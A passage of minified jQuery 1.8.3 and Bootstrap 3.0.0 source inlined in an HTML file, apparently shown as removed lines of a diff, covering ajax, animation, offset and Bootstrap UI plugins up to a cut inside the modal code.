rn=/%20/g,sn=/\[\]$/,on=/\r?\n/g,un=/^(?:color|date|datetime|datetime-local|email|hidden|month|number|password|range|search|tel|text|time|url|week)$/i,an=/^(?:select|textarea)/i;v.fn.extend({serialize:function(){return v.param(this.serializeArray())},serializeArray:function(){return this.map(function(){return this.elements?v.makeArray(this.elements):this}).filter(function(){return this.name&&!this.disabled&&(this.checked||an.test(this.nodeName)||un.test(this.type))}).map(function(e,t){var n=v(this).val();return n==null?null:v.isArray(n)?v.map(n,function(e,n){return{name:t.name,value:e.replace(on,"\r\n")}}):{name:t.name,value:n.replace(on,"\r\n")}}).get()}}),v.param=function(e,n){var r,i=[],s=function(e,t){t=v.isFunction(t)?t():t==null?"":t,i[i.length]=encodeURIComponent(e)+"="+encodeURIComponent(t)};n===t&&(n=v.ajaxSettings&&v.ajaxSettings.traditional);if(v.isArray(e)||e.jquery&&!v.isPlainObject(e))v.each(e,function(){s(this.name,this.value)});else for(r in e)fn(r,e[r],n,s);return i.join("&").replace(rn,"+")};var ln,cn,hn=/#.*$/,pn=/^(.*?):[ \t]*([^\r\n]*)\r?$/mg,dn=/^(?:about|app|app\-storage|.+\-extension|file|res|widget):$/,vn=/^(?:GET|HEAD)$/,mn=/^\/\//,gn=/\?/,yn=/<script\b[^<]*(?:(?!<\/script>)<[^<]*)*<\/script>/gi,bn=/([?&])_=[^&]*/,wn=/^([\w\+\.\-]+:)(?:\/\/([^\/?#:]*)(?::(\d+)|)|)/,En=v.fn.load,Sn={},xn={},Tn=["*/"]+["*"];try{cn=s.href}catch(Nn){cn=i.createElement("a"),cn.href="",cn=cn.href}ln=wn.exec(cn.toLowerCase())||[],v.fn.load=function(e,n,r){if(typeof e!="string"&&En)return En.apply(this,arguments);if(!this.length)return this;var i,s,o,u=this,a=e.indexOf(" ");return a>=0&&(i=e.slice(a,e.length),e=e.slice(0,a)),v.isFunction(n)?(r=n,n=t):n&&typeof n=="object"&&(s="POST"),v.ajax({url:e,type:s,dataType:"html",data:n,complete:function(e,t){r&&u.each(r,o||[e.responseText,t,e])}}).done(function(e){o=arguments,u.html(i?v("<div>").append(e.replace(yn,"")).find(i):e)}),this},v.each("ajaxStart ajaxStop ajaxComplete ajaxError ajaxSuccess ajaxSend".split(" "),function(e,t){v.fn[t]=function(e){return this.on(t,e)}}),v.each(["get","post"],function(e,n){v[n]=function(e,r,i,s){return v.isFunction(r)&&(s=s||i,i=r,r=t),v.ajax({type:n,url:e,data:r,success:i,dataType:s})}}),v.extend({getScript:function(e,n){return v.get(e,t,n,"script")},getJSON:function(e,t,n){return v.get(e,t,n,"json")},ajaxSetup:function(e,t){return t?Ln(e,v.ajaxSettings):(t=e,e=v.ajaxSettings),Ln(e,t),e},ajaxSettings:{url:cn,isLocal:dn.test(ln[1]),global:!0,type:"GET",contentType:"application/x-www-form-urlencoded; charset=UTF-8",processData:!0,async:!0,accepts:{xml:"application/xml, text/xml",html:"text/html",text:"text/plain",json:"application/json, text/javascript","*":Tn},contents:{xml:/xml/,html:/html/,json:/json/},responseFields:{xml:"responseXML",text:"responseText"},converters:{"* text":e.String,"text html":!0,"text json":v.parseJSON,"text xml":v.parseXML},flatOptions:{context:!0,url:!0}},ajaxPrefilter:Cn(Sn),ajaxTransport:Cn(xn),ajax:function(e,n){function T(e,n,s,a){var l,y,b,w,S,T=n;if(E===2)return;E=2,u&&clearTimeout(u),o=t,i=a||"",x.readyState=e>0?4:0,s&&(w=An(c,x,s));if(e>=200&&e<300||e===304)c.ifModified&&(S=x.getResponseHeader("Last-Modified"),S&&(v.lastModified[r]=S),S=x.getResponseHeader("Etag"),S&&(v.etag[r]=S)),e===304?(T="notmodified",l=!0):(l=On(c,w),T=l.state,y=l.data,b=l.error,l=!b);else{b=T;if(!T||e)T="error",e<0&&(e=0)}x.status=e,x.statusText=(n||T)+"",l?d.resolveWith(h,[y,T,x]):d.rejectWith(h,[x,T,b]),x.statusCode(g),g=t,f&&p.trigger("ajax"+(l?"Success":"Error"),[x,c,l?y:b]),m.fireWith(h,[x,T]),f&&(p.trigger("ajaxComplete",[x,c]),--v.active||v.event.trigger("ajaxStop"))}typeof e=="object"&&(n=e,e=t),n=n||{};var r,i,s,o,u,a,f,l,c=v.ajaxSetup({},n),h=c.context||c,p=h!==c&&(h.nodeType||h instanceof v)?v(h):v.event,d=v.Deferred(),m=v.Callbacks("once memory"),g=c.statusCode||{},b={},w={},E=0,S="canceled",x={readyState:0,setRequestHeader:function(e,t){if(!E){var n=e.toLowerCase();e=w[n]=w[n]||e,b[e]=t}return this},getAllResponseHeaders:function(){return E===2?i:null},getResponseHeader:function(e){var n;if(E===2){if(!s){s={};while(n=pn.exec(i))s[n[1].toLowerCase()]=n[2]}n=s[e.toLowerCase()]}return n===t?null:n},overrideMimeType:function(e){return E||(c.mimeType=e),this},abort:function(e){return e=e||S,o&&o.abort(e),T(0,e),this}};d.promise(x),x.success=x.done,x.error=x.fail,x.complete=m.add,x.statusCode=function(e){if(e){var t;if(E<2)for(t in e)g[t]=[g[t],e[t]];else t=e[x.status],x.always(t)}return this},c.url=((e||c.url)+"").replace(hn,"").replace(mn,ln[1]+"//"),c.dataTypes=v.trim(c.dataType||"*").toLowerCase().split(y),c.crossDomain==null&&(a=wn.exec(c.url.toLowerCase()),c.crossDomain=!(!a||a[1]===ln[1]&&a[2]===ln[2]&&(a[3]||(a[1]==="http:"?80:443))==(ln[3]||(ln[1]==="http:"?80:443)))),c.data&&c.processData&&typeof c.data!="string"&&(c.data=v.param(c.data,c.traditional)),kn(Sn,c,n,x);if(E===2)return x;f=c.global,c.type=c.type.toUpperCase(),c.hasContent=!vn.test(c.type),f&&v.active++===0&&v.event.trigger("ajaxStart");if(!c.hasContent){c.data&&(c.url+=(gn.test(c.url)?"&":"?")+c.data,delete c.data),r=c.url;if(c.cache===!1){var N=v.now(),C=c.url.replace(bn,"$1_="+N);c.url=C+(C===c.url?(gn.test(c.url)?"&":"?")+"_="+N:"")}}(c.data&&c.hasContent&&c.contentType!==!1||n.contentType)&&x.setRequestHeader("Content-Type",c.contentType),c.ifModified&&(r=r||c.url,v.lastModified[r]&&x.setRequestHeader("If-Modified-Since",v.lastModified[r]),v.etag[r]&&x.setRequestHeader("If-None-Match",v.etag[r])),x.setRequestHeader("Accept",c.dataTypes[0]&&c.accepts[c.dataTypes[0]]?c.accepts[c.dataTypes[0]]+(c.dataTypes[0]!=="*"?", "+Tn+"; q=0.01":""):c.accepts["*"]);for(l in c.headers)x.setRequestHeader(l,c.headers[l]);if(!c.beforeSend||c.beforeSend.call(h,x,c)!==!1&&E!==2){S="abort";for(l in{success:1,error:1,complete:1})x[l](c[l]);o=kn(xn,c,n,x);if(!o)T(-1,"No Transport");else{x.readyState=1,f&&p.trigger("ajaxSend",[x,c]),c.async&&c.timeout>0&&(u=setTimeout(function(){x.abort("timeout")},c.timeout));try{E=1,o.send(b,T)}catch(k){if(!(E<2))throw k;T(-1,k)}}return x}return x.abort()},active:0,lastModified:{},etag:{}});var Mn=[],_n=/\?/,Dn=/(=)\?(?=&|$)|\?\?/,Pn=v.now();v.ajaxSetup({jsonp:"callback",jsonpCallback:function(){var e=Mn.pop()||v.expando+"_"+Pn++;return this[e]=!0,e}}),v.ajaxPrefilter("json jsonp",function(n,r,i){var s,o,u,a=n.data,f=n.url,l=n.jsonp!==!1,c=l&&Dn.test(f),h=l&&!c&&typeof a=="string"&&!(n.contentType||"").indexOf("application/x-www-form-urlencoded")&&Dn.test(a);if(n.dataTypes[0]==="jsonp"||c||h)return s=n.jsonpCallback=v.isFunction(n.jsonpCallback)?n.jsonpCallback():n.jsonpCallback,o=e[s],c?n.url=f.replace(Dn,"$1"+s):h?n.data=a.replace(Dn,"$1"+s):l&&(n.url+=(_n.test(f)?"&":"?")+n.jsonp+"="+s),n.converters["script json"]=function(){return u||v.error(s+" was not called"),u[0]},n.dataTypes[0]="json",e[s]=function(){u=arguments},i.always(function(){e[s]=o,n[s]&&(n.jsonpCallback=r.jsonpCallback,Mn.push(s)),u&&v.isFunction(o)&&o(u[0]),u=o=t}),"script"}),v.ajaxSetup({accepts:{script:"text/javascript, application/javascript, application/ecmascript, application/x-ecmascript"},contents:{script:/javascript|ecmascript/},converters:{"text script":function(e){return v.globalEval(e),e}}}),v.ajaxPrefilter("script",function(e){e.cache===t&&(e.cache=!1),e.crossDomain&&(e.type="GET",e.global=!1)}),v.ajaxTransport("script",function(e){if(e.crossDomain){var n,r=i.head||i.getElementsByTagName("head")[0]||i.documentElement;return{send:function(s,o){n=i.createElement("script"),n.async="async",e.scriptCharset&&(n.charset=e.scriptCharset),n.src=e.url,n.onload=n.onreadystatechange=function(e,i){if(i||!n.readyState||/loaded|complete/.test(n.readyState))n.onload=n.onreadystatechange=null,r&&n.parentNode&&r.removeChild(n),n=t,i||o(200,"success")},r.insertBefore(n,r.firstChild)},abort:function(){n&&n.onload(0,1)}}}});var Hn,Bn=e.ActiveXObject?function(){for(var e in Hn)Hn[e](0,1)}:!1,jn=0;v.ajaxSettings.xhr=e.ActiveXObject?function(){return!this.isLocal&&Fn()||In()}:Fn,function(e){v.extend(v.support,{ajax:!!e,cors:!!e&&"withCredentials"in e})}(v.ajaxSettings.xhr()),v.support.ajax&&v.ajaxTransport(function(n){if(!n.crossDomain||v.support.cors){var r;return{send:function(i,s){var o,u,a=n.xhr();n.username?a.open(n.type,n.url,n.async,n.username,n.password):a.open(n.type,n.url,n.async);if(n.xhrFields)for(u in n.xhrFields)a[u]=n.xhrFields[u];n.mimeType&&a.overrideMimeType&&a.overrideMimeType(n.mimeType),!n.crossDomain&&!i["X-Requested-With"]&&(i["X-Requested-With"]="XMLHttpRequest");try{for(u in i)a.setRequestHeader(u,i[u])}catch(f){}a.send(n.hasContent&&n.data||null),r=function(e,i){var u,f,l,c,h;try{if(r&&(i||a.readyState===4)){r=t,o&&(a.onreadystatechange=v.noop,Bn&&delete Hn[o]);if(i)a.readyState!==4&&a.abort();else{u=a.status,l=a.getAllResponseHeaders(),c={},h=a.responseXML,h&&h.documentElement&&(c.xml=h);try{c.text=a.responseText}catch(p){}try{f=a.statusText}catch(p){f=""}!u&&n.isLocal&&!n.crossDomain?u=c.text?200:404:u===1223&&(u=204)}}}catch(d){i||s(-1,d)}c&&s(u,f,c,l)},n.async?a.readyState===4?setTimeout(r,0):(o=++jn,Bn&&(Hn||(Hn={},v(e).unload(Bn)),Hn[o]=r),a.onreadystatechange=r):r()},abort:function(){r&&r(0,1)}}}});var qn,Rn,Un=/^(?:toggle|show|hide)$/,zn=new RegExp("^(?:([-+])=|)("+m+")([a-z%]*)$","i"),Wn=/queueHooks$/,Xn=[Gn],Vn={"*":[function(e,t){var n,r,i=this.createTween(e,t),s=zn.exec(t),o=i.cur(),u=+o||0,a=1,f=20;if(s){n=+s[2],r=s[3]||(v.cssNumber[e]?"":"px");if(r!=="px"&&u){u=v.css(i.elem,e,!0)||n||1;do a=a||".5",u/=a,v.style(i.elem,e,u+r);while(a!==(a=i.cur()/o)&&a!==1&&--f)}i.unit=r,i.start=u,i.end=s[1]?u+(s[1]+1)*n:n}return i}]};v.Animation=v.extend(Kn,{tweener:function(e,t){v.isFunction(e)?(t=e,e=["*"]):e=e.split(" ");var n,r=0,i=e.length;for(;r<i;r++)n=e[r],Vn[n]=Vn[n]||[],Vn[n].unshift(t)},prefilter:function(e,t){t?Xn.unshift(e):Xn.push(e)}}),v.Tween=Yn,Yn.prototype={constructor:Yn,init:function(e,t,n,r,i,s){this.elem=e,this.prop=n,this.easing=i||"swing",this.options=t,this.start=this.now=this.cur(),this.end=r,this.unit=s||(v.cssNumber[n]?"":"px")},cur:function(){var e=Yn.propHooks[this.prop];return e&&e.get?e.get(this):Yn.propHooks._default.get(this)},run:function(e){var t,n=Yn.propHooks[this.prop];return this.options.duration?this.pos=t=v.easing[this.easing](e,this.options.duration*e,0,1,this.options.duration):this.pos=t=e,this.now=(this.end-this.start)*t+this.start,this.options.step&&this.options.step.call(this.elem,this.now,this),n&&n.set?n.set(this):Yn.propHooks._default.set(this),this}},Yn.prototype.init.prototype=Yn.prototype,Yn.propHooks={_default:{get:function(e){var t;return e.elem[e.prop]==null||!!e.elem.style&&e.elem.style[e.prop]!=null?(t=v.css(e.elem,e.prop,!1,""),!t||t==="auto"?0:t):e.elem[e.prop]},set:function(e){v.fx.step[e.prop]?v.fx.step[e.prop](e):e.elem.style&&(e.elem.style[v.cssProps[e.prop]]!=null||v.cssHooks[e.prop])?v.style(e.elem,e.prop,e.now+e.unit):e.elem[e.prop]=e.now}}},Yn.propHooks.scrollTop=Yn.propHooks.scrollLeft={set:function(e){e.elem.nodeType&&e.elem.parentNode&&(e.elem[e.prop]=e.now)}},v.each(["toggle","show","hide"],function(e,t){var n=v.fn[t];v.fn[t]=function(r,i,s){return r==null||typeof r=="boolean"||!e&&v.isFunction(r)&&v.isFunction(i)?n.apply(this,arguments):this.animate(Zn(t,!0),r,i,s)}}),v.fn.extend({fadeTo:function(e,t,n,r){return this.filter(Gt).css("opacity",0).show().end().animate({opacity:t},e,n,r)},animate:function(e,t,n,r){var i=v.isEmptyObject(e),s=v.speed(t,n,r),o=function(){var t=Kn(this,v.extend({},e),s);i&&t.stop(!0)};return i||s.queue===!1?this.each(o):this.queue(s.queue,o)},stop:function(e,n,r){var i=function(e){var t=e.stop;delete e.stop,t(r)};return typeof e!="string"&&(r=n,n=e,e=t),n&&e!==!1&&this.queue(e||"fx",[]),this.each(function(){var t=!0,n=e!=null&&e+"queueHooks",s=v.timers,o=v._data(this);if(n)o[n]&&o[n].stop&&i(o[n]);else for(n in o)o[n]&&o[n].stop&&Wn.test(n)&&i(o[n]);for(n=s.length;n--;)s[n].elem===this&&(e==null||s[n].queue===e)&&(s[n].anim.stop(r),t=!1,s.splice(n,1));(t||!r)&&v.dequeue(this,e)})}}),v.each({slideDown:Zn("show"),slideUp:Zn("hide"),slideToggle:Zn("toggle"),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"},fadeToggle:{opacity:"toggle"}},function(e,t){v.fn[e]=function(e,n,r){return this.animate(t,e,n,r)}}),v.speed=function(e,t,n){var r=e&&typeof e=="object"?v.extend({},e):{complete:n||!n&&t||v.isFunction(e)&&e,duration:e,easing:n&&t||t&&!v.isFunction(t)&&t};r.duration=v.fx.off?0:typeof r.duration=="number"?r.duration:r.duration in v.fx.speeds?v.fx.speeds[r.duration]:v.fx.speeds._default;if(r.queue==null||r.queue===!0)r.queue="fx";return r.old=r.complete,r.complete=function(){v.isFunction(r.old)&&r.old.call(this),r.queue&&v.dequeue(this,r.queue)},r},v.easing={linear:function(e){return e},swing:function(e){return.5-Math.cos(e*Math.PI)/2}},v.timers=[],v.fx=Yn.prototype.init,v.fx.tick=function(){var e,n=v.timers,r=0;qn=v.now();for(;r<n.length;r++)e=n[r],!e()&&n[r]===e&&n.splice(r--,1);n.length||v.fx.stop(),qn=t},v.fx.timer=function(e){e()&&v.timers.push(e)&&!Rn&&(Rn=setInterval(v.fx.tick,v.fx.interval))},v.fx.interval=13,v.fx.stop=function(){clearInterval(Rn),Rn=null},v.fx.speeds={slow:600,fast:200,_default:400},v.fx.step={},v.expr&&v.expr.filters&&(v.expr.filters.animated=function(e){return v.grep(v.timers,function(t){return e===t.elem}).length});var er=/^(?:body|html)$/i;v.fn.offset=function(e){if(arguments.length)return e===t?this:this.each(function(t){v.offset.setOffset(this,e,t)});var n,r,i,s,o,u,a,f={top:0,left:0},l=this[0],c=l&&l.ownerDocument;if(!c)return;return(r=c.body)===l?v.offset.bodyOffset(l):(n=c.documentElement,v.contains(n,l)?(typeof l.getBoundingClientRect!="undefined"&&(f=l.getBoundingClientRect()),i=tr(c),s=n.clientTop||r.clientTop||0,o=n.clientLeft||r.clientLeft||0,u=i.pageYOffset||n.scrollTop,a=i.pageXOffset||n.scrollLeft,{top:f.top+u-s,left:f.left+a-o}):f)},v.offset={bodyOffset:function(e){var t=e.offsetTop,n=e.offsetLeft;return v.support.doesNotIncludeMarginInBodyOffset&&(t+=parseFloat(v.css(e,"marginTop"))||0,n+=parseFloat(v.css(e,"marginLeft"))||0),{top:t,left:n}},setOffset:function(e,t,n){var r=v.css(e,"position");r==="static"&&(e.style.position="relative");var i=v(e),s=i.offset(),o=v.css(e,"top"),u=v.css(e,"left"),a=(r==="absolute"||r==="fixed")&&v.inArray("auto",[o,u])>-1,f={},l={},c,h;a?(l=i.position(),c=l.top,h=l.left):(c=parseFloat(o)||0,h=parseFloat(u)||0),v.isFunction(t)&&(t=t.call(e,n,s)),t.top!=null&&(f.top=t.top-s.top+c),t.left!=null&&(f.left=t.left-s.left+h),"using"in t?t.using.call(e,f):i.css(f)}},v.fn.extend({position:function(){if(!this[0])return;var e=this[0],t=this.offsetParent(),n=this.offset(),r=er.test(t[0].nodeName)?{top:0,left:0}:t.offset();return n.top-=parseFloat(v.css(e,"marginTop"))||0,n.left-=parseFloat(v.css(e,"marginLeft"))||0,r.top+=parseFloat(v.css(t[0],"borderTopWidth"))||0,r.left+=parseFloat(v.css(t[0],"borderLeftWidth"))||0,{top:n.top-r.top,left:n.left-r.left}},offsetParent:function(){return this.map(function(){var e=this.offsetParent||i.body;while(e&&!er.test(e.nodeName)&&v.css(e,"position")==="static")e=e.offsetParent;return e||i.body})}}),v.each({scrollLeft:"pageXOffset",scrollTop:"pageYOffset"},function(e,n){var r=/Y/.test(n);v.fn[e]=function(i){return v.access(this,function(e,i,s){var o=tr(e);if(s===t)return o?n in o?o[n]:o.document.documentElement[i]:e[i];o?o.scrollTo(r?v(o).scrollLeft():s,r?s:v(o).scrollTop()):e[i]=s},e,i,arguments.length,null)}}),v.each({Height:"height",Width:"width"},function(e,n){v.each({padding:"inner"+e,content:n,"":"outer"+e},function(r,i){v.fn[i]=function(i,s){var o=arguments.length&&(r||typeof i!="boolean"),u=r||(i===!0||s===!0?"margin":"border");return v.access(this,function(n,r,i){var s;return v.isWindow(n)?n.document.documentElement["client"+e]:n.nodeType===9?(s=n.documentElement,Math.max(n.body["scroll"+e],s["scroll"+e],n.body["offset"+e],s["offset"+e],s["client"+e])):i===t?v.css(n,r,i,u):v.style(n,r,i,u)},n,o?i:t,o,null)}})}),e.jQuery=e.$=v,typeof define=="function"&&define.amd&&define.amd.jQuery&&define("jquery",[],function(){return v})})(window);</script>
-<!-- END extlib/js/jquery-1.8.3.min.js -->
-<!-- START extlib/js/bootstrap-3.0.0.min.js -->
-<script type="text/javascript">/**
-* bootstrap.js v3.0.0 by @fat and @mdo
-* Copyright 2013 Twitter Inc.
-* http://www.apache.org/licenses/LICENSE-2.0
-*/
-if(!jQuery)throw new Error("Bootstrap requires jQuery");+function(a){"use strict";function b(){var a=document.createElement("bootstrap"),b={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd otransitionend",transition:"transitionend"};for(var c in b)if(void 0!==a.style[c])return{end:b[c]}}a.fn.emulateTransitionEnd=function(b){var c=!1,d=this;a(this).one(a.support.transition.end,function(){c=!0});var e=function(){c||a(d).trigger(a.support.transition.end)};return setTimeout(e,b),this},a(function(){a.support.transition=b()})}(window.jQuery),+function(a){"use strict";var b='[data-dismiss="alert"]',c=function(c){a(c).on("click",b,this.close)};c.prototype.close=function(b){function c(){f.trigger("closed.bs.alert").remove()}var d=a(this),e=d.attr("data-target");e||(e=d.attr("href"),e=e&&e.replace(/.*(?=#[^\s]*$)/,""));var f=a(e);b&&b.preventDefault(),f.length||(f=d.hasClass("alert")?d:d.parent()),f.trigger(b=a.Event("close.bs.alert")),b.isDefaultPrevented()||(f.removeClass("in"),a.support.transition&&f.hasClass("fade")?f.one(a.support.transition.end,c).emulateTransitionEnd(150):c())};var d=a.fn.alert;a.fn.alert=function(b){return this.each(function(){var d=a(this),e=d.data("bs.alert");e||d.data("bs.alert",e=new c(this)),"string"==typeof b&&e[b].call(d)})},a.fn.alert.Constructor=c,a.fn.alert.noConflict=function(){return a.fn.alert=d,this},a(document).on("click.bs.alert.data-api",b,c.prototype.close)}(window.jQuery),+function(a){"use strict";var b=function(c,d){this.$element=a(c),this.options=a.extend({},b.DEFAULTS,d)};b.DEFAULTS={loadingText:"loading..."},b.prototype.setState=function(a){var b="disabled",c=this.$element,d=c.is("input")?"val":"html",e=c.data();a+="Text",e.resetText||c.data("resetText",c[d]()),c[d](e[a]||this.options[a]),setTimeout(function(){"loadingText"==a?c.addClass(b).attr(b,b):c.removeClass(b).removeAttr(b)},0)},b.prototype.toggle=function(){var a=this.$element.closest('[data-toggle="buttons"]');if(a.length){var b=this.$element.find("input").prop("checked",!this.$element.hasClass("active")).trigger("change");"radio"===b.prop("type")&&a.find(".active").removeClass("active")}this.$element.toggleClass("active")};var c=a.fn.button;a.fn.button=function(c){return this.each(function(){var d=a(this),e=d.data("bs.button"),f="object"==typeof c&&c;e||d.data("bs.button",e=new b(this,f)),"toggle"==c?e.toggle():c&&e.setState(c)})},a.fn.button.Constructor=b,a.fn.button.noConflict=function(){return a.fn.button=c,this},a(document).on("click.bs.button.data-api","[data-toggle^=button]",function(b){var c=a(b.target);c.hasClass("btn")||(c=c.closest(".btn")),c.button("toggle"),b.preventDefault()})}(window.jQuery),+function(a){"use strict";var b=function(b,c){this.$element=a(b),this.$indicators=this.$element.find(".carousel-indicators"),this.options=c,this.paused=this.sliding=this.interval=this.$active=this.$items=null,"hover"==this.options.pause&&this.$element.on("mouseenter",a.proxy(this.pause,this)).on("mouseleave",a.proxy(this.cycle,this))};b.DEFAULTS={interval:5e3,pause:"hover",wrap:!0},b.prototype.cycle=function(b){return b||(this.paused=!1),this.interval&&clearInterval(this.interval),this.options.interval&&!this.paused&&(this.interval=setInterval(a.proxy(this.next,this),this.options.interval)),this},b.prototype.getActiveIndex=function(){return this.$active=this.$element.find(".item.active"),this.$items=this.$active.parent().children(),this.$items.index(this.$active)},b.prototype.to=function(b){var c=this,d=this.getActiveIndex();return b>this.$items.length-1||0>b?void 0:this.sliding?this.$element.one("slid",function(){c.to(b)}):d==b?this.pause().cycle():this.slide(b>d?"next":"prev",a(this.$items[b]))},b.prototype.pause=function(b){return b||(this.paused=!0),this.$element.find(".next, .prev").length&&a.support.transition.end&&(this.$element.trigger(a.support.transition.end),this.cycle(!0)),this.interval=clearInterval(this.interval),this},b.prototype.next=function(){return this.sliding?void 0:this.slide("next")},b.prototype.prev=function(){return this.sliding?void 0:this.slide("prev")},b.prototype.slide=function(b,c){var d=this.$element.find(".item.active"),e=c||d[b](),f=this.interval,g="next"==b?"left":"right",h="next"==b?"first":"last",i=this;if(!e.length){if(!this.options.wrap)return;e=this.$element.find(".item")[h]()}this.sliding=!0,f&&this.pause();var j=a.Event("slide.bs.carousel",{relatedTarget:e[0],direction:g});if(!e.hasClass("active")){if(this.$indicators.length&&(this.$indicators.find(".active").removeClass("active"),this.$element.one("slid",function(){var b=a(i.$indicators.children()[i.getActiveIndex()]);b&&b.addClass("active")})),a.support.transition&&this.$element.hasClass("slide")){if(this.$element.trigger(j),j.isDefaultPrevented())return;e.addClass(b),e[0].offsetWidth,d.addClass(g),e.addClass(g),d.one(a.support.transition.end,function(){e.removeClass([b,g].join(" ")).addClass("active"),d.removeClass(["active",g].join(" ")),i.sliding=!1,setTimeout(function(){i.$element.trigger("slid")},0)}).emulateTransitionEnd(600)}else{if(this.$element.trigger(j),j.isDefaultPrevented())return;d.removeClass("active"),e.addClass("active"),this.sliding=!1,this.$element.trigger("slid")}return f&&this.cycle(),this}};var c=a.fn.carousel;a.fn.carousel=function(c){return this.each(function(){var d=a(this),e=d.data("bs.carousel"),f=a.extend({},b.DEFAULTS,d.data(),"object"==typeof c&&c),g="string"==typeof c?c:f.slide;e||d.data("bs.carousel",e=new b(this,f)),"number"==typeof c?e.to(c):g?e[g]():f.interval&&e.pause().cycle()})},a.fn.carousel.Constructor=b,a.fn.carousel.noConflict=function(){return a.fn.carousel=c,this},a(document).on("click.bs.carousel.data-api","[data-slide], [data-slide-to]",function(b){var c,d=a(this),e=a(d.attr("data-target")||(c=d.attr("href"))&&c.replace(/.*(?=#[^\s]+$)/,"")),f=a.extend({},e.data(),d.data()),g=d.attr("data-slide-to");g&&(f.interval=!1),e.carousel(f),(g=d.attr("data-slide-to"))&&e.data("bs.carousel").to(g),b.preventDefault()}),a(window).on("load",function(){a('[data-ride="carousel"]').each(function(){var b=a(this);b.carousel(b.data())})})}(window.jQuery),+function(a){"use strict";var b=function(c,d){this.$element=a(c),this.options=a.extend({},b.DEFAULTS,d),this.transitioning=null,this.options.parent&&(this.$parent=a(this.options.parent)),this.options.toggle&&this.toggle()};b.DEFAULTS={toggle:!0},b.prototype.dimension=function(){var a=this.$element.hasClass("width");return a?"width":"height"},b.prototype.show=function(){if(!this.transitioning&&!this.$element.hasClass("in")){var b=a.Event("show.bs.collapse");if(this.$element.trigger(b),!b.isDefaultPrevented()){var c=this.$parent&&this.$parent.find("> .panel > .in");if(c&&c.length){var d=c.data("bs.collapse");if(d&&d.transitioning)return;c.collapse("hide"),d||c.data("bs.collapse",null)}var e=this.dimension();this.$element.removeClass("collapse").addClass("collapsing")[e](0),this.transitioning=1;var f=function(){this.$element.removeClass("collapsing").addClass("in")[e]("auto"),this.transitioning=0,this.$element.trigger("shown.bs.collapse")};if(!a.support.transition)return f.call(this);var g=a.camelCase(["scroll",e].join("-"));this.$element.one(a.support.transition.end,a.proxy(f,this)).emulateTransitionEnd(350)[e](this.$element[0][g])}}},b.prototype.hide=function(){if(!this.transitioning&&this.$element.hasClass("in")){var b=a.Event("hide.bs.collapse");if(this.$element.trigger(b),!b.isDefaultPrevented()){var c=this.dimension();this.$element[c](this.$element[c]())[0].offsetHeight,this.$element.addClass("collapsing").removeClass("collapse").removeClass("in"),this.transitioning=1;var d=function(){this.transitioning=0,this.$element.trigger("hidden.bs.collapse").removeClass("collapsing").addClass("collapse")};return a.support.transition?(this.$element[c](0).one(a.support.transition.end,a.proxy(d,this)).emulateTransitionEnd(350),void 0):d.call(this)}}},b.prototype.toggle=function(){this[this.$element.hasClass("in")?"hide":"show"]()};var c=a.fn.collapse;a.fn.collapse=function(c){return this.each(function(){var d=a(this),e=d.data("bs.collapse"),f=a.extend({},b.DEFAULTS,d.data(),"object"==typeof c&&c);e||d.data("bs.collapse",e=new b(this,f)),"string"==typeof c&&e[c]()})},a.fn.collapse.Constructor=b,a.fn.collapse.noConflict=function(){return a.fn.collapse=c,this},a(document).on("click.bs.collapse.data-api","[data-toggle=collapse]",function(b){var c,d=a(this),e=d.attr("data-target")||b.preventDefault()||(c=d.attr("href"))&&c.replace(/.*(?=#[^\s]+$)/,""),f=a(e),g=f.data("bs.collapse"),h=g?"toggle":d.data(),i=d.attr("data-parent"),j=i&&a(i);g&&g.transitioning||(j&&j.find('[data-toggle=collapse][data-parent="'+i+'"]').not(d).addClass("collapsed"),d[f.hasClass("in")?"addClass":"removeClass"]("collapsed")),f.collapse(h)})}(window.jQuery),+function(a){"use strict";function b(){a(d).remove(),a(e).each(function(b){var d=c(a(this));d.hasClass("open")&&(d.trigger(b=a.Event("hide.bs.dropdown")),b.isDefaultPrevented()||d.removeClass("open").trigger("hidden.bs.dropdown"))})}function c(b){var c=b.attr("data-target");c||(c=b.attr("href"),c=c&&/#/.test(c)&&c.replace(/.*(?=#[^\s]*$)/,""));var d=c&&a(c);return d&&d.length?d:b.parent()}var d=".dropdown-backdrop",e="[data-toggle=dropdown]",f=function(b){a(b).on("click.bs.dropdown",this.toggle)};f.prototype.toggle=function(d){var e=a(this);if(!e.is(".disabled, :disabled")){var f=c(e),g=f.hasClass("open");if(b(),!g){if("ontouchstart"in document.documentElement&&!f.closest(".navbar-nav").length&&a('<div class="dropdown-backdrop"/>').insertAfter(a(this)).on("click",b),f.trigger(d=a.Event("show.bs.dropdown")),d.isDefaultPrevented())return;f.toggleClass("open").trigger("shown.bs.dropdown"),e.focus()}return!1}},f.prototype.keydown=function(b){if(/(38|40|27)/.test(b.keyCode)){var d=a(this);if(b.preventDefault(),b.stopPropagation(),!d.is(".disabled, :disabled")){var f=c(d),g=f.hasClass("open");if(!g||g&&27==b.keyCode)return 27==b.which&&f.find(e).focus(),d.click();var h=a("[role=menu] li:not(.divider):visible a",f);if(h.length){var i=h.index(h.filter(":focus"));38==b.keyCode&&i>0&&i--,40==b.keyCode&&i<h.length-1&&i++,~i||(i=0),h.eq(i).focus()}}}};var g=a.fn.dropdown;a.fn.dropdown=function(b){return this.each(function(){var c=a(this),d=c.data("dropdown");d||c.data("dropdown",d=new f(this)),"string"==typeof b&&d[b].call(c)})},a.fn.dropdown.Constructor=f,a.fn.dropdown.noConflict=function(){return a.fn.dropdown=g,this},a(document).on("click.bs.dropdown.data-api",b).on("click.bs.dropdown.data-api",".dropdown form",function(a){a.stopPropagation()}).on("click.bs.dropdown.data-api",e,f.prototype.toggle).on("keydown.bs.dropdown.data-api",e+", [role=menu]",f.prototype.keydown)}(window.jQuery),+function(a){"use strict";var b=function(b,c){this.options=c,this.$element=a(b),this.$backdrop=this.isShown=null,this.options.remote&&this.$element.load(this.options.remote)};b.DEFAULTS={backdrop:!0,keyboard:!0,show:!0},b.prototype.toggle=function(a){return this[this.isShown?"hide":"show"](a)},b.prototype.show=function(b){var c=this,d=a.Event("show.bs.modal",{relatedTarget:b});this.$element.trigger(d),this.isShown||d.isDefaultPrevented()||(this.isShown=!0,this.escape(),this.$element.on("click.dismiss.modal",'[data-dismiss="modal"]',a.proxy(this.hide,this)),this.backdrop(function(){var 